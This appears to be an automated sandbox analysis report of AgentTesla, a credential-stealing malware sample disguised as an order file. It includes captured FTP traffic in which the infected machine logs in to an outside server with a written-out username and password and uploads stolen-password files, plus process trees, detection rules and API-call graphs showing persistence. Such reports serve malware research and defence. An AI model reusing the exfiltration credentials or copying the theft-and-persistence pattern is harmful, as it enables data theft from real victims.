                                                            2024-10-09 13:02:04 UTC8000INData Raw: 50 32 ff 4b 3f af b0 33 ec 1d 96 0d a7 bf ed ea 5e 56 f1 2a 40 6d 43 2d f0 4f f1 36 ad 80 78 d1 52 9d d2 07 74 7f 51 f6 31 e1 e1 cd 1d b3 61 36 63 b2 50 58 32 54 48 f3 84 c9 52 c8 46 90 0d 67 a4 d0 cb c8 50 08 a7 5e 37 62 57 85 ea 68 1a 8f 74 57 25 b8 5f e9 5d 6a 82 ed 57 28 0e b1 0b 51 06 2c 9a ac 5b f5 90 bd 42 92 8e 57 9f 49 95 5a a7 21 3b 48 4b e8 3a 6d 37 f4 29 35 87 85 1b 1f 78 1b f8 3a 5b 77 27 b8 7e 13 f2 e1 44 98 d5 6f 33 18 ca 45 4c de 4e 47 fe 13 79 3c d2 56 96 e4 d0 a7 3a 98 b1 65 0d 96 3b d3 e1 5e b4 3e 3b 08 cf 56 6d bf b3 3d 6d 1e 1c bc b8 1d f8 07 d1 36 cc 7c 7d b6 2d e9 c7 62 f4 54 cf f6 45 94 91 42 8a 58 b6 23 44 c0 e8 fc bd a1 eb b7 d8 54 58 4b 21 fb 18 ff af aa 5c b6 99 c0 3d 55 8a c6 f7 64 7d 49 3c 75 16 59 61 97 aa 00 40 1a 7d 8b 20
                                                            Data Ascii: P2K?3^V*@mC-O6xRtQ1a6cPX2THRFgP^7bWhtW%_]jW(Q,[BWIZ!;HK:m7)5x:[w'~Do3ELNGy<V:e;^>;Vm=m6|}-bTEBX#DTXK!\=Ud}I<uYa@}
                                                            2024-10-09 13:02:04 UTC8000INData Raw: 1d 8a bf 75 2d cc ee e4 41 90 85 e4 0f 9e 47 2f 3a 5a 10 b9 52 98 68 39 e0 7d 50 88 d8 22 ac 38 e7 09 6a 84 13 26 e4 ab 33 ce 3b 15 0c a8 62 de 65 2c af e0 95 07 d5 1c 38 7f 4d 2b f3 83 37 c9 1c 1b f6 af 1c d6 73 d2 ce 1f 44 76 d3 b9 e8 26 58 b2 b3 10 3d ce a5 88 f1 4a 13 38 fa 63 e5 5e c1 6b 5c 33 ab 22 74 8c 8c 30 9c f8 5c 22 cc 27 ba a8 63 b5 8c 89 a9 46 72 5e 2a 6c 0e 57 2a 38 2f b0 ae ed 0e 92 59 32 65 79 45 16 31 2e 70 fa 1f cc fd 56 fc e8 30 2a e4 6b 39 6a a8 88 ec 8a de 5a 2d ca 6e d8 d0 c1 b3 a7 93 eb 56 69 74 39 7d 72 4b 06 13 e3 fe 73 3b ca b9 33 a4 2c bd 28 ce e0 a8 b4 5d f4 b8 23 a9 8c fd af 89 91 9b 74 82 af 9a 76 0b 35 c0 a1 9d ad 38 7e 3f 89 05 25 f5 e4 9d 68 4d 53 47 fe 36 a0 62 69 9b 5c 72 a1 06 03 66 6c ce 2c ff 16 82 23 00 76 d7 a9 9b
                                                            Data Ascii: u-AG/:ZRh9}P"8j&3;be,8M+7sDv&X=J8c^k\3"t0\"'cFr^*lW*8/Y2eyE1.pV0*k9jZ-nVit9}rKs;3,(]#tv58~?%hMSG6bi\rfl,#v
                                                            2024-10-09 13:02:04 UTC8000INData Raw: da 1d 2c 51 0b 48 d0 b0 57 51 b3 44 1d 40 1f 53 ea 98 4f c5 cf b7 e1 c9 df 10 0d 0f 11 26 c8 71 36 f8 e0 2f 7f 39 b4 8b 83 a0 a9 2e a0 5b 3e 4d cc 79 20 36 d4 07 2a 00 a8 6d 4f e1 da 53 fa 23 6d f0 39 ca 60 81 87 66 e1 d0 20 e8 22 c3 6e 08 a0 48 ca 6e 8b 08 70 39 c3 3c e5 3f 20 17 fd 1b 98 10 b7 98 28 35 ea e3 34 b7 0f 7a ef 95 f2 43 4a 77 73 e8 e8 9e bf d6 ec b8 5c 3b 9a e5 06 80 3c e5 24 8b 32 52 56 4b ad 17 15 03 9c bd 37 c9 65 f6 f4 40 06 f2 7a bc c4 ae f8 f0 2d fd 11 3f 59 1f 68 8f 24 c9 c3 52 ec 66 24 cb 41 85 16 d6 13 2f 4b b1 82 24 20 8b b3 bf b7 de ba 91 a0 b1 e8 1e 95 55 a4 a2 b3 62 ab f8 e7 3e dd 71 ad 2e eb 82 c4 2a 24 48 e0 a5 0d 4f c6 7a a8 fa fb 3e a5 56 d3 f9 d5 d4 42 ca 68 26 4c 6d c6 a7 b9 44 e7 8e c4 d7 3c 83 5b 11 6d 3f f5 dc 14 d3 0c
                                                            Data Ascii: ,QHWQD@SO&q6/9.[>My 6*mOS#m9`f "nHnp9<? (54zCJws\;<$2RVK7e@z-?Yh$Rf$A/K$ Ub>q.*$HOz>VBh&LmD<[m?
                                                            2024-10-09 13:02:04 UTC8000INData Raw: dd 01 b8 33 bb 76 d4 e0 a7 97 cb 81 3e 16 97 a7 00 a7 25 ae a7 d5 09 7c 1a 3c cf 7e bb b4 6d 71 72 24 dc e7 f3 6d 86 5c 58 f4 ed 8d 45 ca a1 f9 21 01 e1 5d ef ba a2 51 f8 bf ce 65 ff ca 52 a1 7a ab 15 81 95 ff 1a 61 a3 22 8a 5c f1 01 77 23 16 62 c6 a2 ae 01 63 17 b0 f6 23 e1 f2 c6 13 49 47 69 3a f2 54 40 b5 3d 67 20 4e 95 e1 4a 63 18 a8 47 39 83 d2 ed a2 fe 00 c0 ce e7 b0 0c 3d d5 9b 11 9b b8 63 56 19 ce 86 86 0f 8b 58 ee 07 e7 c0 33 a8 0b 75 fd c7 e0 fc 12 f4 6e d0 16 34 06 d3 29 3a 8f 0b 02 fd 6f fa f5 46 1f 5d 69 80 80 4a 18 78 96 d9 af 53 50 a1 da 49 3f 03 db c2 8f c8 86 cb aa 82 84 3b 77 25 9d 4b e0 74 f0 1e 60 16 13 08 17 f7 2d ce 1c 1b 9f dc 7d 9c 46 fb 26 2b 60 f0 59 15 03 f3 aa 6c 3a 6a 5d 09 c9 cf 3c 62 ba 5f fc 7f 73 69 5f 49 f0 1c 62 f5 19 da
                                                            Data Ascii: 3v>%|<~mqr$m\XE!]QeRza"\w#bc#IGi:T@=g NJcG9=cVX3un4):oF]iJxSPI?;w%Kt`-}F&+`Yl:j]<b_si_Ib
                                                            2024-10-09 13:02:04 UTC8000INData Raw: 95 56 61 0f 61 8f ce b9 86 30 8f fb 99 97 5e 84 b9 91 bb b0 20 17 48 12 3f 9d 40 e5 85 31 7d 29 be 90 c9 f3 72 3d 38 de be 52 fc 41 63 77 75 53 ac f5 6e 1a cb 40 f4 55 03 88 3f 89 a5 18 19 12 ec 3e 60 1d cd b3 05 fb 23 a0 5b 91 3b 2f 7c ff 14 28 99 8f df 38 db a5 ca 75 2b 76 33 17 27 4f 0a d1 6c fe 3c 76 aa 51 b3 e8 45 d1 ba fa cd 4f 48 17 5e 4f 68 57 31 2a 40 22 e2 4e df 55 83 bb 7e 5b 79 93 d1 51 cf 49 dd bd 60 60 4a b7 67 8a e5 33 a9 72 43 61 07 60 ff c7 55 6b 59 f9 a0 0c 9d 1e 31 70 2e 32 71 f1 e7 7b 8d 94 0d bb 29 6f ec a7 d9 91 4c ca c4 f7 8b 31 0d 54 29 cb 46 60 6a b2 8e 77 20 64 8a 20 d0 3f cb 94 41 08 a2 3f 97 eb 32 46 bc 69 14 98 d2 ab ed 09 4b bc 34 cc fe 75 70 c3 0d 6c 55 36 0e 29 64 2b bb 26 c1 7b 92 02 53 97 7b 68 96 0d d3 12 f8 9b 7f d0 3f
                                                            Data Ascii: Vaa0^ H?@1})r=8RAcwuSn@U?>`#[;/|(8u+v3'Ol<vQEOH^OhW1*@"NU~[yQI``Jg3rCa`UkY1p.2q{)oL1T)F`jw d ?A?2FiK4uplU6)d+&{S{h?
                                                            2024-10-09 13:02:04 UTC8000INData Raw: 3c bb ee c0 25 a7 cb 08 3c 34 bc b2 22 90 76 40 3d bb 29 7e 17 a5 a4 6b a7 fb d0 0c 06 5f 5c 60 ba eb 6c 59 13 8f f0 ed db 91 65 f9 b6 a6 26 9d 4d cf 4d 03 69 70 5a 9b ed 45 e3 fc 3e aa 38 5a e5 9a 0b e2 19 03 e8 11 af b8 81 2c a0 5c fd bd 6a db 2a 42 59 97 3b 9f 7e 63 47 a1 4a b6 8a f6 5b dc e5 9b 3b eb 3b c2 d4 df b7 e0 56 af 3f 08 94 fd e4 41 3a ae f3 1f 95 18 06 98 da 66 94 6c b2 dc 1b 96 9f a5 8f 6c 66 4e e8 e1 06 be 12 34 15 a9 4a f4 86 83 6a 20 00 df b9 96 a8 55 82 d8 0c 98 15 34 95 eb 44 78 05 d4 53 ea 2e 7e 6b fd 40 7f 71 a0 f6 45 aa 1e 31 b3 af c7 69 c4 02 6d 24 46 ef 59 ee 21 7b 7d 89 3f 97 58 12 81 f1 86 1b 49 b0 d1 c5 36 8e b6 1e 8c 5e db 21 f6 46 50 80 09 d2 bb 5d ae 4c 5d c4 9a 10 80 a1 a8 56 24 08 b6 b2 b0 e4 91 78 46 81 66 6e 80 8e c0 ac
                                                            Data Ascii: <%<4"v@=)~k_\`lYe&MMipZE>8Z,\j*BY;~cGJ[;;V?A:fllfN4Jj U4DxS.~k@qE1im$FY!{}?XI6^!FP]L]V$xFfn


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Oct 9, 2024 15:01:44.032128096 CEST21497665.2.84.236192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                            Oct 9, 2024 15:01:44.032381058 CEST4976621192.168.2.95.2.84.236USER fgghv@alternatifplastik.com
                                                            Oct 9, 2024 15:01:44.253540993 CEST21497665.2.84.236192.168.2.9331 User fgghv@alternatifplastik.com OK. Password required
                                                            Oct 9, 2024 15:01:44.253741026 CEST4976621192.168.2.95.2.84.236PASS Fineboy777@
                                                            Oct 9, 2024 15:01:44.558885098 CEST21497665.2.84.236192.168.2.9230 OK. Current restricted directory is /
                                                            Oct 9, 2024 15:01:44.779025078 CEST21497665.2.84.236192.168.2.9504 Unknown command
                                                            Oct 9, 2024 15:01:44.779361010 CEST4976621192.168.2.95.2.84.236PWD
                                                            Oct 9, 2024 15:01:44.999363899 CEST21497665.2.84.236192.168.2.9257 "/" is your current location
                                                            Oct 9, 2024 15:01:44.999527931 CEST4976621192.168.2.95.2.84.236TYPE I
                                                            Oct 9, 2024 15:01:45.221997023 CEST21497665.2.84.236192.168.2.9200 TYPE is now 8-bit binary
                                                            Oct 9, 2024 15:01:45.222273111 CEST4976621192.168.2.95.2.84.236PASV
                                                            Oct 9, 2024 15:01:45.442713976 CEST21497665.2.84.236192.168.2.9227 Entering Passive Mode (5,2,84,236,230,117)
                                                            Oct 9, 2024 15:01:45.449007034 CEST4976621192.168.2.95.2.84.236STOR PW_user-651689_2024_10_09_09_01_41.html
                                                            Oct 9, 2024 15:01:46.060630083 CEST21497665.2.84.236192.168.2.9150 Accepted data connection
                                                            Oct 9, 2024 15:01:46.283751011 CEST21497665.2.84.236192.168.2.9226-File successfully transferred
                                                            226-File successfully transferred226 0.224 seconds (measured here), 1.39 Kbytes per second
                                                            Oct 9, 2024 15:02:00.664175987 CEST21498535.2.84.236192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                            Oct 9, 2024 15:02:00.664474010 CEST4985321192.168.2.95.2.84.236USER fgghv@alternatifplastik.com
                                                            Oct 9, 2024 15:02:00.892010927 CEST21498535.2.84.236192.168.2.9331 User fgghv@alternatifplastik.com OK. Password required
                                                            Oct 9, 2024 15:02:00.892241001 CEST4985321192.168.2.95.2.84.236PASS Fineboy777@
                                                            Oct 9, 2024 15:02:01.336200953 CEST21498535.2.84.236192.168.2.9230 OK. Current restricted directory is /
                                                            Oct 9, 2024 15:02:01.564239025 CEST21498535.2.84.236192.168.2.9504 Unknown command
                                                            Oct 9, 2024 15:02:01.564428091 CEST4985321192.168.2.95.2.84.236PWD
                                                            Oct 9, 2024 15:02:01.792363882 CEST21498535.2.84.236192.168.2.9257 "/" is your current location
                                                            Oct 9, 2024 15:02:01.793025970 CEST4985321192.168.2.95.2.84.236TYPE I
                                                            Oct 9, 2024 15:02:02.020143032 CEST21498535.2.84.236192.168.2.9200 TYPE is now 8-bit binary
                                                            Oct 9, 2024 15:02:02.020306110 CEST4985321192.168.2.95.2.84.236PASV
                                                            Oct 9, 2024 15:02:02.247364044 CEST21498535.2.84.236192.168.2.9227 Entering Passive Mode (5,2,84,236,248,124)
                                                            Oct 9, 2024 15:02:02.253420115 CEST4985321192.168.2.95.2.84.236STOR PW_user-651689_2024_10_09_09_01_58.html
                                                            Oct 9, 2024 15:02:02.887054920 CEST21498535.2.84.236192.168.2.9150 Accepted data connection
                                                            Oct 9, 2024 15:02:03.259938955 CEST21498535.2.84.236192.168.2.9226-File successfully transferred
                                                            226-File successfully transferred226 0.228 seconds (measured here), 1.36 Kbytes per second
                                                            Oct 9, 2024 15:02:08.675556898 CEST21498945.2.84.236192.168.2.9220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 16:02. Server port: 21.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 16:02. Server port: 21.220-This is a private system - No anonymous login
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 16:02. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 16:02. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                            Oct 9, 2024 15:02:08.675856113 CEST4989421192.168.2.95.2.84.236USER fgghv@alternatifplastik.com
                                                            Oct 9, 2024 15:02:08.900168896 CEST21498945.2.84.236192.168.2.9331 User fgghv@alternatifplastik.com OK. Password required
                                                            Oct 9, 2024 15:02:08.923407078 CEST4989421192.168.2.95.2.84.236PASS Fineboy777@
                                                            Oct 9, 2024 15:02:09.167845011 CEST21498945.2.84.236192.168.2.9230 OK. Current restricted directory is /
                                                            Oct 9, 2024 15:02:09.394056082 CEST21498945.2.84.236192.168.2.9504 Unknown command
                                                            Oct 9, 2024 15:02:09.394401073 CEST4989421192.168.2.95.2.84.236PWD
                                                            Oct 9, 2024 15:02:09.618685007 CEST21498945.2.84.236192.168.2.9257 "/" is your current location
                                                            Oct 9, 2024 15:02:09.618923903 CEST4989421192.168.2.95.2.84.236TYPE I
                                                            Oct 9, 2024 15:02:09.844202995 CEST21498945.2.84.236192.168.2.9200 TYPE is now 8-bit binary
                                                            Oct 9, 2024 15:02:09.844340086 CEST4989421192.168.2.95.2.84.236PASV
                                                            Oct 9, 2024 15:02:10.069533110 CEST21498945.2.84.236192.168.2.9227 Entering Passive Mode (5,2,84,236,255,149)
                                                            Oct 9, 2024 15:02:10.076009035 CEST4989421192.168.2.95.2.84.236STOR PW_user-651689_2024_10_09_09_02_06.html
                                                            Oct 9, 2024 15:02:10.692442894 CEST21498945.2.84.236192.168.2.9150 Accepted data connection
                                                            Oct 9, 2024 15:02:10.917622089 CEST21498945.2.84.236192.168.2.9226-File successfully transferred
                                                            226-File successfully transferred226 0.225 seconds (measured here), 1.38 Kbytes per second

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:09:01:34
                                                            Start date:09/10/2024
                                                            Path:C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe"
                                                            Imagebase:0xf70000
                                                            File size:39'936 bytes
                                                            MD5 hash:7EDAA96C807197B45FFB4F442AB3BFAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1399224699.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1410088723.0000000006EA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1389741733.0000000003483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1389741733.0000000003252000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:09:01:39
                                                            Start date:09/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0xa50000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1561474335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1570412470.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1570412470.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:09:01:52
                                                            Start date:09/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\Fqhnalw.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Fqhnalw.exe"
                                                            Imagebase:0xb80000
                                                            File size:39'936 bytes
                                                            MD5 hash:7EDAA96C807197B45FFB4F442AB3BFAA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1566745789.0000000003125000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1585499252.000000000417C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1566745789.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 32%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:09:01:57
                                                            Start date:09/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0xe90000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1655327124.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1655327124.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:09:02:01
                                                            Start date:09/10/2024
                                                            Path:C:\Users\user\AppData\Roaming\Fqhnalw.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Fqhnalw.exe"
                                                            Imagebase:0xc20000
                                                            File size:39'936 bytes
                                                            MD5 hash:7EDAA96C807197B45FFB4F442AB3BFAA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1677808724.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1653047795.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1653047795.0000000003042000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:09:02:05
                                                            Start date:09/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0xe90000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2583924445.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2583924445.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:11.5%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:7.2%
                                                              Total number of Nodes:529
                                                              Total number of Limit Nodes:55
                                                              execution_graph 61382 6f276c2 61383 6f276cc 61382->61383 61387 6f1e0b9 61383->61387 61394 6f1e0c8 61383->61394 61384 6f2770a 61388 6f1e0c8 61387->61388 61389 6f1e0f3 61388->61389 61401 6ff0c27 61388->61401 61407 6ff128a 61388->61407 61414 6ff0ecf 61388->61414 61420 6ff0c45 61388->61420 61389->61384 61395 6f1e0dd 61394->61395 61396 6ff0ecf 2 API calls 61395->61396 61397 6f1e0f3 61395->61397 61398 6ff128a 2 API calls 61395->61398 61399 6ff0c27 2 API calls 61395->61399 61400 6ff0c45 4 API calls 61395->61400 61396->61397 61397->61384 61398->61397 61399->61397 61400->61397 61402 6ff120f 61401->61402 61429 6ff37c0 61402->61429 61434 6ff3800 61402->61434 61439 6ff37b0 61402->61439 61403 6ff1268 61408 6ff128e 61407->61408 61409 6ff1244 61407->61409 61410 6ff1268 61409->61410 61411 6ff37c0 2 API calls 61409->61411 61412 6ff37b0 2 API calls 61409->61412 61413 6ff3800 2 API calls 61409->61413 61411->61410 61412->61410 61413->61410 61415 6ff0ede 61414->61415 61417 6ff0ff8 61415->61417 61452 6f19ae0 61415->61452 61456 6f19ad4 61415->61456 61417->61389 61421 6ff0c4b 61420->61421 61422 6ff0ff8 61421->61422 61423 6ff0d04 61421->61423 61460 6ff3658 61421->61460 61465 6ff3648 61421->61465 61422->61389 61423->61422 61425 6f19ae0 RegOpenKeyExA 61423->61425 61426 6f19ad4 RegOpenKeyExA 61423->61426 61424 6ff13ac 61425->61424 61426->61424 61430 6ff37d5 61429->61430 61444 6f19898 61430->61444 61448 6f1988c 61430->61448 61435 6ff37e4 61434->61435 61437 6f19898 CopyFileA 61435->61437 61438 6f1988c CopyFileA 61435->61438 61436 6ff37f3 61436->61403 61437->61436 61438->61436 61440 6ff37b4 61439->61440 61442 6f19898 CopyFileA 61440->61442 61443 6f1988c CopyFileA 61440->61443 61441 6ff37f3 61441->61403 61442->61441 61443->61441 61445 6f198ed CopyFileA 61444->61445 61447 6f199ef 61445->61447 61449 6f19898 CopyFileA 61448->61449 61451 6f199ef 61449->61451 61453 6f19b3b RegOpenKeyExA 61452->61453 61455 6f19bdd 61453->61455 61457 6f19ad8 RegOpenKeyExA 61456->61457 61459 6f19bdd 61457->61459 61461 6ff366d 61460->61461 61470 6f19ca8 61461->61470 61474 6f19c9d 61461->61474 61466 6ff364c 61465->61466 61468 6f19ca8 RegSetValueExA 61466->61468 61469 6f19c9d RegSetValueExA 61466->61469 61467 6ff3692 61467->61421 61468->61467 61469->61467 61471 6f19d03 RegSetValueExA 61470->61471 61473 6f19dbc 61471->61473 61475 6f19c86 61474->61475 61475->61474 61476 6f19d82 RegSetValueExA 61475->61476 61477 6f19dbc 61476->61477 61378 6f173e0 61379 6f1742e NtProtectVirtualMemory 61378->61379 61381 6f17478 61379->61381 61985 30bccd8 61986 30bccd9 61985->61986 61990 30bceab 61986->61990 61994 30bceb8 61986->61994 61987 30bce0b 61991 30bceb4 61990->61991 61998 30baf70 61991->61998 61995 30bceb9 61994->61995 61996 30baf70 DuplicateHandle 61995->61996 61997 30bcee6 61996->61997 61997->61987 61999 30bcf20 DuplicateHandle 61998->61999 62001 30bcee6 61999->62001 62001->61987 61478 6f275c6 61479 6f275cc 61478->61479 